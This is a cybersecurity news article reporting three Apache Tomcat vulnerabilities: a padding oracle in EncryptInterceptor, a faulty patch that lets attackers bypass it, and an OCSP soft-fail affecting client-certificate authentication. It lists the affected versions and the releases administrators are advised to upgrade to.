Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
The Future of Encryption: Top Post-Quantum Cryptography Solutions for 2026
July 3, 2026
Alibaba Bans Internal Use of Claude AI Over Backdoor Concerns
July 3, 2026
Apache ActiveMQ Critical Vulnerabilities Allow DoS Attacks, System Crashes
July 3, 2026
Home/CyberSecurity News/Critical Apache Tomcat Flaws Let Attackers Bypass EncryptInterceptor
CyberSecurity News

Critical Apache Tomcat Flaws Let Attackers Bypass EncryptInterceptor

Key Takeaways The Apache Software Foundation has released urgent security updates for Apache Tomcat, addressing several critical vulnerabilities. A flawed initial patch introduced a new severe flaw...

David kimber
David kimber
April 13, 2026 3 Min Read
29 0

Key Takeaways

  • The Apache Software Foundation has released urgent security updates for Apache Tomcat, addressing several critical vulnerabilities.
  • A flawed initial patch introduced a new severe flaw (CVE-2026-34486) allowing attackers to completely bypass the EncryptInterceptor.
  • Other issues include a padding oracle attack (CVE-2026-29146) and a certificate authentication bypass (CVE-2026-34500).
  • Multiple versions of Apache Tomcat, including 11.x, 10.x, and 9.x, are affected.
  • Immediate upgrades to versions 11.0.21, 10.1.54, or 9.0.117 (or later) are crucial for all administrators.

The Apache Software Foundation has issued a series of emergency security updates for Apache Tomcat, addressing multiple vulnerabilities that could expose servers to significant risks. These advisories highlight a critical patching error that inadvertently introduced a complete interception bypass, alongside issues affecting certificate authentication and susceptibility to padding oracle attacks.

Table Of Content

  • Key Takeaways
  • Flawed Patch Leads to EncryptInterceptor Bypass
  • Certificate Validation Failures and Padding Oracle Attacks
  • Affected Versions and Recommended Updates
  • What You Should Do

System administrators are strongly advised to update their Apache Tomcat deployments without delay to mitigate potential exploitation and secure their environments.

Flawed Patch Leads to EncryptInterceptor Bypass

At the forefront of these concerns is a severe flaw stemming from an initial security patch. Researchers at Oligo Security, Uri Katz and Avi Lumelsky, first identified CVE-2026-29146, an “Important” severity vulnerability where the EncryptInterceptor component of Tomcat defaulted to using Cipher Block Chaining (CBC). This configuration made servers vulnerable to a padding oracle attack, potentially enabling malicious actors to decrypt intercepted network traffic.

To address this initial cryptographic weakness, Apache released an initial round of updates. However, this fix inadvertently introduced a new, equally critical vulnerability, tracked as CVE-2026-34486. Bartlomiej Dmitruk from striga.ai identified this subsequent flaw, which allows attackers to completely bypass the EncryptInterceptor. Organizations that applied the intermediary update versions are particularly exposed to this bypass mechanism due to the defective nature of the initial patch.

Certificate Validation Failures and Padding Oracle Attacks

In addition to the EncryptInterceptor issues, Apache has also resolved a “Moderate” severity vulnerability, CVE-2026-34500, impacting the Online Certificate Status Protocol (OCSP) checks within Tomcat. Discovered and reported by Haruki Oyama from Waseda University, this flaw manifests under specific conditions when the Foreign Function and Memory (FFM) API is in use. It causes the system to experience a soft fail during OCSP validation, even when administrators have explicitly disabled soft-failing.

The consequence is that CLIENT_CERT authentication does not fail as expected, leading to unexpected authentication behaviors that could compromise access controls and potentially allow unauthorized access.

Affected Versions and Recommended Updates

The vulnerabilities span multiple branches of Apache Tomcat. Specifically, the flawed patch that enables the EncryptInterceptor bypass (CVE-2026-34486) affects:

  • Apache Tomcat 11.0.20
  • Apache Tomcat 10.1.53
  • Apache Tomcat 9.0.116

The broader set of vulnerabilities, including the initial padding oracle attack (CVE-2026-29146) and the certificate validation failures (CVE-2026-34500), impact an even wider range of earlier versions:

  • Apache Tomcat 11.0.0-M1 through 11.0.20
  • Apache Tomcat 10.1.0-M1 through 10.1.53
  • Apache Tomcat 9.0.13 through 9.0.116

To fully address all three vulnerabilities—the flawed EncryptInterceptor patch, the padding oracle attack, and the OCSP certificate validation failure—administrators must upgrade their systems to the latest secure releases. The Apache Software Foundation strongly advises applying the following updates:

  • Upgrade Apache Tomcat 11.x deployments to version 11.0.21 or later
  • Upgrade Apache Tomcat 10.x deployments to version 10.1.54 or later
  • Upgrade Apache Tomcat 9.x deployments to version 9.0.117 or later

Organizations operating older, End-of-Life (EOL) versions of Tomcat must migrate to a supported branch immediately, as these legacy systems will not receive patches for these critical flaws.

What You Should Do

  • Immediately identify all Apache Tomcat instances within your environment.
  • Verify the current version of each Apache Tomcat deployment.
  • Prioritize upgrading all affected versions to Apache Tomcat 11.0.21, 10.1.54, or 9.0.117, or newer.
  • For any End-of-Life (EOL) Tomcat versions, plan and execute a migration to a currently supported branch as soon as possible.
  • Monitor Apache Software Foundation security advisories for any further updates or emerging threats related to Tomcat.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackCVEExploitPatchSecurityThreatVulnerability

Share Article

David kimber

David kimber

David is a penetration tester turned security journalist with expertise in mobile security, IoT vulnerabilities, and exploit development. As an OSCP-certified security professional, David brings hands-on technical experience to his reporting on vulnerabilities and security research. His articles often feature detailed technical analysis of exploits and provide actionable defense recommendations. David maintains an active presence in the security research community and has contributed to multiple open-source security tools.

Previous Post

Critical Axios Vulnerability Lets Attackers Remotely Execute Code

Next Post

Mozilla Criticizes Microsoft for Forced Copilot Installation on Windows

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Nebula AI Platform Automates Pen Testing to Find Vulnerabilities
July 3, 2026
PureLog Stealer Uses Blogspot and PowerShell to Deliver Malware
July 3, 2026
FBI Warns TeamPCP Hackers Exploit Developer Tools in Supply Chain Attacks
July 3, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us